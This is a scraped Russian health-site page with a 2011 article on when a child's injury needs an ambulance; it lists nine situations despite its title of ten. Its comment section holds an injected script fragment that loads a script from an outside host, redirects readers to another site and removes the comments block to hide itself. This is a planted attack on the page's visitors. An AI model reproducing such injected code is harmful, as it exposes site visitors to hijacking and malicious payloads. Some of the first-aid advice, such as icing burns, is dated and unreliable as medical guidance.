Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 типовых ситуаций, когд...  >>  10 типовых ситуаций, когда ребенку нужна скорая
 
Обратная связь
 

10 типовых ситуаций, когда ребенку нужна скорая

Размер шрифта
06 сентября 2011 07:00
  • google_analytics: false
  • Нравится

Ваш ребенок кричит от боли, а вы не знаете, что предпринять. Как понять, когда нужно бить тревогу и вызывать скорую, а когда – успокоиться и решить проблему в домашних условиях? Вот 10 типовых ситуаций, которые обычно случаются с детьми, и 10 решений для них.


Александр Тушкин / «Здоровье инфо»


  1. Ребенок неудачно скатился с горки, упал лицом на землю и выбил зуб.

Оставьте скорую в покое. Лучше обратитесь к стоматологу – он удостоверится, что зуб выпал из лунки правильно, а ребенок не сможет вдохнуть его остатки. Если зуб болтается, то стоматолог сделает анестезию и окончательно удалит его. Потеря молочного зуба – небольшая проблема, ведь вместо него вырастет новый, хороший зуб. Если выпал взрослый зуб, положите его в молоко и вручите дантисту. Есть большая вероятность того, что у него получится имплантировать его обратно.

Если удар об землю был сильным, то зуб мог вдавиться в десну. Это опасно тем, что он мог повредить взрослый зуб.

Если ваш ребенок сипит и кашляет, а вы не можете найти выпавший зуб – немедленно вызывайте скорую, так как, скорее всего, зуб попал ребенку в легкие.


  1. Ребенок опрокинул на себя кружку горячего чая.

Вызывайте скорую, если ожог обширный или он покрывает лицо, руки, ноги или гениталии. В другом случае справляйтесь своими силами. Первым делом необходимо удалить обжигающую жидкость с тела. Снимите промокшую одежду и подставьте обожженную часть тела под холодный душ. Он остановит дальнейшее повреждение кожи и мгновенно предотвратит боль.

Не мажьте ожог маслом, сметаной, майонезом или вазелином. Жир создает барьер, который сохраняет тепло и усугубляет ожог. Для ожога первой степени (красная кожа) и второй (пузыри) используйте антибактериальный ожоговый крем (мазь). Пораженную поверхность накройте бинтом. Сверху можно приложить лед в пакете. Дайте ребенку обезболивающее средство, например, парацетамол или ибупрофен.


  1. Ваше чадо укусил чужой ребенок.

В неотложку звонить не надо. Помните, что рот человека – один из самых грязных в природе. Промойте место укуса с мылом и теплой водой, сверху наложите антибактериальную мазь и повязку. На всякий случай запишитесь к педиатру – он должен осмотреть место укуса и в случае опасности заражения выписать антибиотик.


  1. Ребенка ужалила пчела.

Вызовите скорую, если у ребенка сильная аллергия на пчелиный яд. У особо чувствительных детей возникает сильная реакция вплоть до анафилактического шока. Признаки аллергической реакции включают затрудненное или свистящее дыхание, затрудненное глотание, отек лица, горла или рта, крапивница, которая распространяется далеко за пределы укуса, головокружение.

Даже если ваш ребенок не аллергик, первым делом вам необходимо удалить жало, так как оно распространяет яд в течение нескольких секунд. Удалите жало при помощи пальцев, пинцета, кредитной карты или столового ножа. Наложите холодный компресс. Если место укуса сильно чешется, дайте ребенку каламин.


  1. Вы меняли подгузник и заметили красные пятна по всему телу малыша.

Не беспокойте сотрудников скорой помощи. Крапивница (аллергическая сыпь, уртикария) – очень часто встречается у детей в этом возрасте. Она может выглядеть ужасно из-за того, что поражает обширные области на теле, однако бить тревогу не стоит. Аллергическая реакция может возникнуть на что угодно: мыло, шампунь, солнцезащитный крем, одеяло, новую одежду, изменения температуры. Используйте антигистаминные средства для уменьшения зуда. Если у вашего ребенка опухли губы или язык, его тошнит, а дыхание затруднено – срочно за скорой!

  1. Ребенок выпал из коляски. На голове огромная шишка.

Не звоните в скорую, лучше дайте ребенку выплакаться и прокричаться. Если он самостоятельно поднялся на ноги, то с ним будет все в порядке. На голове находится куча масса разных сосудов, поэтому размер шишки может быть огромен. Это никак не связано с серьезностью травмы. Большинство травм головы у детей младшего возраста быстро проходят.

Если вашему ребенку меньше года, обязательно покажите его врачу. За остальными детьми стоит просто понаблюдать в течение пары часов. Если вы не заметите тошноты, внезапной сонливости или других тревожных признаков, то все нормально.


  1. Какой-то болван врезался в бок вашей машины. Ребенок находится в своем кресле и кричит.

Позвоните в скорую помощь, если ребенок не успокоился через 15-20 минут. Детское автокресло надежно защищает ребенка от травм, однако продолжительный плач может свидетельствовать о том, что ваше чадо хорошо тряхнуло во время аварии. Врач должен определить, есть ли какие-то травмы.

Вытащите ребенка из автокресла и успокойте. Обратитесь к врачу, если в моче появилась кровь, а на теле – сильные кровоподтеки от ремней.


  1. Что-то попало в глаз ребенку.

Немедленно вызывайте врача, если было повреждено глазное яблоко. Проблема в том, что часто это бывает трудно определить из-за обильного кровотечения. Кожа вокруг глаза очень тонкая, поэтому даже небольшая травма может выглядеть намного хуже, чем в действительности. Если ваш ребенок не может двигать или открыть глаз, то это свидетельствует о том, что глазное яблоко повреждено.

Если бровь или веко рассечено, то необходимо остановить кровь и вызвать врача, чтобы зашить рану.

Если все в порядке, приложите лед и не удивляйтесь, если глаз будет оставаться заплывшим в течение пары дней.


  1. Ребенок упал и прикусил язык.

Вызовите скорую, если у вас не получается остановить кровь через 10-15 минут. В языке множество кровеносных сосудов, поэтому останавливать ее надо с помощью чистой ткани, смоченной в холодной воде. Помните, что плач делает кровотечение сильнее. После травмы избегайте соленой и кислой еды. Вместе этого лучше есть мороженое и охлажденные молочные коктейли.


  1. Ребенок глотнул алкоголь.

Вызывайте скорую, если не можете точно оценить, сколько ваш ребенок мог выпить. Алкоголь действует на детей и взрослых одинаково. Однако детям нужно гораздо меньше, чтобы опьянеть. Кроме того, алкоголь вызывает резкое падение уровня сахара в крови. У детей запас сахара намного ниже, а это может привести к смерти.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Магниты убивают детей! Как их защитить?   Что нельзя пить беременным в новый год?!   Как не умереть от маленькой царапинки   Как сохранить детское зрение  
23 сентября 2011Физкультура до добра не доводит? 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Что вы знаете о грудном вскармливании?
Что есть будущим мамам?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.